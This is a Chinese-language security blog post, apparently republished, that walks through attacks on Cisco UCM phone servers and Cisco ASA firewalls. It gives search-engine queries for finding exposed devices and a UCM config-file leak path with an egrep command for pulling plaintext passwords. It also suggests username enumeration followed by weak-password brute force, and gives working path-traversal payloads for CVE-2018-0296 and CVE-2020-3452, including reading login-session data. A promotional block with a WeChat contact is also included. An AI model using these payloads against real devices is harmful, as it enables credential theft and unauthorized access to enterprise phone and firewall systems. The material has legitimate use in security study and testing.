前言
上一篇文章介紹了cisco路由器設備的2個漏洞案例,這次補充cisco ip電話設備和安全設備的漏洞案例,
CISCO-UCM ConfigFileCacheList.txt 泄漏
CISCO-UCM 全稱Cisco Unified Communications Manager,是用于集成CISCO的語音視頻通話、訊息傳遞和移動協作的基礎設施
部分 CUCM 服務器在埠 TCP/6970 上有一個 HTTP 服務,其中存在 ConfigFileCacheList.txt 檔案,包含位于 TFTP 目錄中的所有檔案名
fofa陳述句
product=="CISCO-UCM"
shodan陳述句
http.html:"Cisco Unified Communications Manager"
payload
x.x.x.x:6970/ConfigFileCacheList.txt
在目標檔案中包含了許多SEP開頭的檔案,那是ip電話的組態檔,sep后面接的是mac地址

可以遍歷下載這個ConfigFileCacheList.txt檔案內容中的所有檔案

在下載的組態檔中,包含ip,描述,埠等配置資訊

甚至有的還會包含明文的賬號密碼

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
可以用egrep批量查找
egrep -r 'Password' *.xml

在組態檔中獲得了賬號密碼后,可以嘗試登錄UCM的web后臺

當然這個 ConfigFileCacheList.txt 泄漏比較少見,如果遇到UCM可以試試訪問/cucm-uds/users路徑,可以泄漏用戶名資訊,再針對用戶名進一步爆破弱口令

CVE-2018-0296 Cisco ASA 目錄遍歷漏洞
Cisco ASA是思科的防火墻設備,一般用于在企業邊界,包含了ips,avc,wse等應用功能,
fofa陳述句
app="CISCO-ASA-5520"
根據文章 https://www.anquanke.com/post/id/171916 中的描述,CVE-2018-0296在不同型號設備上存在2種利用場景,一種是拒絕服務造成設備崩潰重啟,一種是目錄遍歷獲得敏感資訊
在修復方案中則是增加了對./和../的處理邏輯,以防止目錄遍歷
拒絕服務這里就不具體測驗了,主要看下目錄遍歷的利用
檢測poc
/+CSCOU+/../+CSCOE+/files/file_list.json

注意,類似的poc不能在瀏覽器里直接粘貼訪問,因為瀏覽器會自動將訪問的路徑類似/../決議為上一級目錄,也就是訪問的為/+CSCOE+/files/file_list.json
列出 /sessions 目錄的內容
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions

提取登錄用戶的登錄資訊
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/[name]

CVE-2020-3452 Cisco ASA 目錄遍歷漏洞
CVE-2020-3452漏洞可以在未驗證的情況下進行任意檔案讀取
該漏洞源于 ASA 和 FTD 的 web 服務介面在處理 HTTP 請求的 URL 時缺乏正確的輸入驗證,導致攻擊者可以在目標設備上查看系統內的web目錄檔案,
此漏洞不能用于獲取對 ASA 或 FTD 系統檔案或底層作業系統 (OS) 檔案的訪問,所以只能讀取 web 系統目錄的檔案,比如 webvpn 的組態檔、書簽、網路 cookies、部分網路內容和超文本傳輸協議網址等資訊,
作者在推特分享的檢測poc
https://twitter.com/aboul3la/status/1286141887716503553
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
讀取 /+CSCOE+/portal_inc.lua 檔案

至于進一步利用,有研究人員給出了一些已知檔案串列
https://twitter.com/HackerGautam/status/1286652700432662528
https://raw.githubusercontent.com/3ndG4me/CVE-2020-3452-Exploit/master/cisco_asa_file_list.txt
不過實際測驗,除了session.js 跑出了一個亂碼的內容以外,其他的檔案多是一些資源檔案,難以進一步利用,
更多靶場實驗練習、網安學習資料,請點擊這里>>
合天智匯:合天網路靶場、網安實戰虛擬環境
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/522912.html
標籤:其他
上一篇:SQL注入
下一篇:Struts2-001淺析
